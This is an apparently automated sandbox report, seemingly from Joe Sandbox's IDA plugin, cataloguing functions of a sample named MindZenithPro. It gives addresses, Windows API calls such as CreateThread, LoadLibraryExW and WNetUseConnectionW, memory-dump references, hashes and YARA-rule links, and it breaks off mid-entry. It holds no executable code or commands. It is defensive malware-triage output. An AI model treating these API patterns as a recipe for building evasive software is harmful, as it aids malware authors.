                                    • Opcode ID: b3fc8184e7df02d84f8b7cde853068c4d344da0d3b8055d2ebc70d9aaf325ae5
                                    • Instruction ID: f2e2a72bf3c0edf32744d57538d6d9b279b8e672a02252075bac6d53f27b5794
                                    • Opcode Fuzzy Hash: b3fc8184e7df02d84f8b7cde853068c4d344da0d3b8055d2ebc70d9aaf325ae5
                                    • Instruction Fuzzy Hash: BA114C71901119BBDF10DF68D8459EE7BB8FF04302F440566E942E3142D374BE96CBAA
                                    Function 0042E817 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 0042E83E
                                    • MessageBoxW.USER32(?,?,?,?), ref: 0042E871
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0042E887
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0042E88E
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: 7e04ef49b7be51f506ad6146529aa43f2b97f0542dd1bc4633db2de7e52e54cd
                                    • Instruction ID: 3234f601c35fe0908667500136d8adae7effb157042c8886025e781ec03c68f7
                                    • Opcode Fuzzy Hash: 7e04ef49b7be51f506ad6146529aa43f2b97f0542dd1bc4633db2de7e52e54cd
                                    • Instruction Fuzzy Hash: E311E971E00265BBC7119BB9AC04A8B7F689F45310F144277F811D7391D6B8C90087A5
                                    Function 003ED51C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,?,003ED349,00000000,00000004,00000000), ref: 003ED568
                                    • GetLastError.KERNEL32 ref: 003ED574
                                    • __dosmaperr.LIBCMT ref: 003ED57B
                                    • ResumeThread.KERNEL32(00000000), ref: 003ED599
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                    • String ID:
                                    • API String ID: 173952441-0
                                    • Opcode ID: a04e3378183619ec9d42744e23938c0d55b6c004c52746d1578d94121a8ec66b
                                    • Instruction ID: ff0a36688fb503cb94d6a02a4044b36a381cf5f1fff2d45f745f4c567ab4fbea
                                    • Opcode Fuzzy Hash: a04e3378183619ec9d42744e23938c0d55b6c004c52746d1578d94121a8ec66b
                                    • Instruction Fuzzy Hash: 3A01D676800268BBCB225F66DC05AAF7B6DDF82735F110368F925861D0DF708840C6A1
                                    Function 003C66CB Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003C6709
                                    • GetStockObject.GDI32(00000011), ref: 003C671D
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C6727
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 7550c47beb5bc55dcc5359c55f8a32f3c627455ef54f8fba25772d65e9dd2daa
                                    • Instruction ID: e1605994fe8e345a7cef1c70b0b3ed53c7f38735115e66d1c9d380ba60f7122d
                                    • Opcode Fuzzy Hash: 7550c47beb5bc55dcc5359c55f8a32f3c627455ef54f8fba25772d65e9dd2daa
                                    • Instruction Fuzzy Hash: C311ADB2501608BFDF124F909C55FEABB6DEF48398F01012AFA0092010D731DC60ABA0
                                    Function 003F33C3 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00430F03,00000000,00000000,?,003F336A,00430F03,00000000,00000000,00000000,?,003F35DB,00000006,FlsSetValue), ref: 003F33F5
                                    • GetLastError.KERNEL32(?,003F336A,00430F03,00000000,00000000,00000000,?,003F35DB,00000006,FlsSetValue,00463268,FlsSetValue,00000000,00000364,?,003F3196), ref: 003F3401
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,003F336A,00430F03,00000000,00000000,00000000,?,003F35DB,00000006,FlsSetValue,00463268,FlsSetValue,00000000), ref: 003F340F
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: c356ecbd0df8408eccaf4c6fabeebecf4b4076dda049cd5c2b17418494ae3544
                                    • Instruction ID: 90b9f61bc9abd59e5755c99485e69e884a4463ae04b01506be7d1733c23fa8f0
                                    • Opcode Fuzzy Hash: c356ecbd0df8408eccaf4c6fabeebecf4b4076dda049cd5c2b17418494ae3544
                                    • Instruction Fuzzy Hash: D1012B32A1172AEBCB338B7AAC44A7A775CAF44BA1B520630FE06D3241D720DD41C6E5
                                    Function 00427B5D Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00427B78
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00427B90
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00427BA5
                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00427BC3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Type$Register$FileLoadModuleNameUser
                                    • String ID:
                                    • API String ID: 1352324309-0
                                    • Opcode ID: 08f8e864e9941acb1b5ed9107b17b8f86222481d243cd6997f38f834864d1702
                                    • Instruction ID: cf816fda7fc8e8332bfb8b2303ffedf63e527b286edfaae0965f3d2af093c602
                                    • Opcode Fuzzy Hash: 08f8e864e9941acb1b5ed9107b17b8f86222481d243cd6997f38f834864d1702
                                    • Instruction Fuzzy Hash: BC11A1B17093249BE7208F24EC08F967BFCEF01B08F90852AE556D6151D7B4F944DB55
                                    Function 0042B7A9 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0042B3D4,?,00008000), ref: 0042B7C5
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0042B3D4,?,00008000), ref: 0042B7EA
                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0042B3D4,?,00008000), ref: 0042B7F4
                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0042B3D4,?,00008000), ref: 0042B827
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CounterPerformanceQuerySleep
                                    • String ID:
                                    • API String ID: 2875609808-0
                                    • Opcode ID: 69b8355bdb7f65a6032f0bcea61791c0218d6678e0e5893ec8f5809e553618ba
                                    • Instruction ID: 67328bc98f053aaf5f32bb1a37986e639ee0542bbde904a5bff1e02a092aa97b
                                    • Opcode Fuzzy Hash: 69b8355bdb7f65a6032f0bcea61791c0218d6678e0e5893ec8f5809e553618ba
                                    • Instruction Fuzzy Hash: 93118E71E00A29DBCF10AFE4E9486EEBF78FF49711F414096D841B2241CB349950CBD9
                                    Function 00458500 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 0045851F
                                    • ScreenToClient.USER32(?,?), ref: 00458537
                                    • ScreenToClient.USER32(?,?), ref: 0045855B
                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00458576
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ClientRectScreen$InvalidateWindow
                                    • String ID:
                                    • API String ID: 357397906-0
                                    • Opcode ID: 6cf48d6fb947b549e8e9bbf5f5b4238be7b7ba3c9f760300ec316c1ae7dfa900
                                    • Instruction ID: 8fee66a92921f3268f32540c2908020ee88a19d2bdd57f4d08a5a2d2c1135951
                                    • Opcode Fuzzy Hash: 6cf48d6fb947b549e8e9bbf5f5b4238be7b7ba3c9f760300ec316c1ae7dfa900
                                    • Instruction Fuzzy Hash: 071140B9D00209AFDB51CFA8C884AEEBBB5FF08311F108166E915E3211D735AA55CF95
                                    Function 00423489 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004234A7
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004234B8
                                    • GetCurrentThreadId.KERNEL32 ref: 004234BF
                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004234C6
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                    • String ID:
                                    • API String ID: 2710830443-0
                                    • Opcode ID: b17c65d693a03623666b5a628a74faff5a58e7ae81462d82039a7f8a4e39842b
                                    • Instruction ID: 9a22618fc4c966af2bfd0959efba6defe626af304bac28f6f9874b93bbefffff
                                    • Opcode Fuzzy Hash: b17c65d693a03623666b5a628a74faff5a58e7ae81462d82039a7f8a4e39842b
                                    • Instruction Fuzzy Hash: 92E06571A0133477D6306B62AC0DFE77F6CDF42BA2F400065F505D109296ACC941C1B5
                                    Function 00458F4F Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003D986F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003D98C9
                                      • Part of subcall function 003D986F: SelectObject.GDI32(?,00000000), ref: 003D98D8
                                      • Part of subcall function 003D986F: BeginPath.GDI32(?), ref: 003D98EF
                                      • Part of subcall function 003D986F: SelectObject.GDI32(?,00000000), ref: 003D9918
                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00458F73
                                    • LineTo.GDI32(?,?,?), ref: 00458F80
                                    • EndPath.GDI32(?), ref: 00458F90
                                    • StrokePath.GDI32(?), ref: 00458F9E
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: 97957c6210210951112046871669b4dfefecabbf98d976b8b4ead1416d6d62bf
                                    • Instruction ID: a4a183c38d2a5c6bde9c41fcb9b0f9971c8f4d1eb97a8fd6ee583393a03e42a2
                                    • Opcode Fuzzy Hash: 97957c6210210951112046871669b4dfefecabbf98d976b8b4ead1416d6d62bf
                                    • Instruction Fuzzy Hash: EDF0E932105719BBDB221F50AC0DFCE3F199F0A715F048011FA01651E287B49511DF9D
                                    Function 003D9AE0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000008), ref: 003D9AFC
                                    • SetTextColor.GDI32(?,?), ref: 003D9B06
                                    • SetBkMode.GDI32(?,00000001), ref: 003D9B19
                                    • GetStockObject.GDI32(00000005), ref: 003D9B21
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Color$ModeObjectStockText
                                    • String ID:
                                    • API String ID: 4037423528-0
                                    • Opcode ID: a7ec381e5edc19ee40962c65b97736fb156c2740975755c49a342ea83788381c
                                    • Instruction ID: 3e49964adde95064db9150e50551831bce03cf42ffbd14b5ad5d59a963cf7246
                                    • Opcode Fuzzy Hash: a7ec381e5edc19ee40962c65b97736fb156c2740975755c49a342ea83788381c
                                    • Instruction Fuzzy Hash: 7FE06531644740AADB315F74BC09BD93B21EF15336F048226F6F5841E1C77186809B15
                                    Function 0041EACE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0041EACE
                                    • GetDC.USER32(00000000), ref: 0041EAD8
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041EAF8
                                    • ReleaseDC.USER32(?), ref: 0041EB19
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: e276c84576d09147384e986f8379c84f2463f40ef7057583042aac1c27e3ead0
                                    • Instruction ID: 0978606c5b8c5eb2853c1f1a690b13d7f1be1efc3f4852a530d485c5491893e6
                                    • Opcode Fuzzy Hash: e276c84576d09147384e986f8379c84f2463f40ef7057583042aac1c27e3ead0
                                    • Instruction Fuzzy Hash: E6E01A75C00304EFCB51AFA09808A6DBBB5FF08312F10806AF80AE7251DB789942EF05
                                    Function 0041EAE2 Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetDesktopWindow.USER32 ref: 0041EAE2
                                    • GetDC.USER32(00000000), ref: 0041EAEC
                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041EAF8
                                    • ReleaseDC.USER32(?), ref: 0041EB19
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: CapsDesktopDeviceReleaseWindow
                                    • String ID:
                                    • API String ID: 2889604237-0
                                    • Opcode ID: a7e65742b4caee90ae34c37de93b1e1c0421c3c9f0d30f1575ffb477c78c339d
                                    • Instruction ID: ed241d1d014f09e1a274fdd1cf0550a5a195899b9e10d20c1308f86efece8795
                                    • Opcode Fuzzy Hash: a7e65742b4caee90ae34c37de93b1e1c0421c3c9f0d30f1575ffb477c78c339d
                                    • Instruction Fuzzy Hash: 7FE01A75C00304EFCB61AFA09808A5DBBB5AF08312F108069F80AE7251D7389902DF04
                                    Function 004354F6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 003C3914: _wcslen.LIBCMT ref: 003C3919
                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00435643
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: Connection_wcslen
                                    • String ID: *$LPT
                                    • API String ID: 1725874428-3443410124
                                    • Opcode ID: 495edcab35e42de180e6dfb59293d72ee88cc68284763f0021a4cb09acf77aa1
                                    • Instruction ID: bc1f4f1f80ddeecfea86beb00c545ce2692856cd09ce499dccaf7e5d6c87fae1
                                    • Opcode Fuzzy Hash: 495edcab35e42de180e6dfb59293d72ee88cc68284763f0021a4cb09acf77aa1
                                    • Instruction Fuzzy Hash: B9919F75A00604DFCB15DF54C485EAABBF5AF48304F19909EE80A9F362C735EE86CB94
                                    Function 00425498 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00425644
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ContainedObject
                                    • String ID: $I$Container
                                    • API String ID: 3565006973-4023653158
                                    • Opcode ID: 295099063889a6f6d93516651ca57953034d07f7d229a0f8ac048398cfa986de
                                    • Instruction ID: 344ed09724886365c93e1495bd9fb112de47f2576babfe558a6949336cc3d36b
                                    • Opcode Fuzzy Hash: 295099063889a6f6d93516651ca57953034d07f7d229a0f8ac048398cfa986de
                                    • Instruction Fuzzy Hash: 04813570600611AFDB14DF68C884B6ABBF9FF48700F60856EF94A8F291DBB5E841CB54
                                    Function 003EE5CD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 003EE65D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: a201c30fb3ef6e2cb2db187c97dd7cac8a5610716282db4139367e3a25cf38a3
                                    • Instruction ID: c0c8307cd61dab4b377a0b492d65934351061ed50c9f59ef8d87c21df9a04d57
                                    • Opcode Fuzzy Hash: a201c30fb3ef6e2cb2db187c97dd7cac8a5610716282db4139367e3a25cf38a3
                                    • Instruction Fuzzy Hash: 4351DC71E0414A96CB1BBB18CD013BA2BA4BB10750F314F68F0C5463E9EF358CDA9A4A
                                    Function 003DA7AA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
                                    • Associated: 00000013.00000002.1707050381.00000000003C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.000000000045D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707519547.0000000000483000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707654791.000000000048D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000013.00000002.1707685571.0000000000495000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_3c0000_MindZenithPro.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #
                                    • API String ID: 0-1885708031
                                    • Opcode ID: 0deda01e6b71c512db4dee046548a9624c13fdeece59d16d7e457eaaf60194fa
                                    • Instruction ID: 7d149461da037276ed5209777cd1dcbaae25d1e321299890903b23ed505c2535
                                    • Opcode Fuzzy Hash: 0deda01e6b71c512db4dee046548a9624c13fdeece59d16d7e457eaaf60194fa
                                    • Instruction Fuzzy Hash: F951333650034ACFDB16DF68D080AFA7BA0EF15710F28405AEC619B390DB399D83DB65
                                    Function 003DF7BC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000000), ref: 003DF7CD
                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 003DF7E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.1707120318.00000000003C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003C0000, based on PE: true
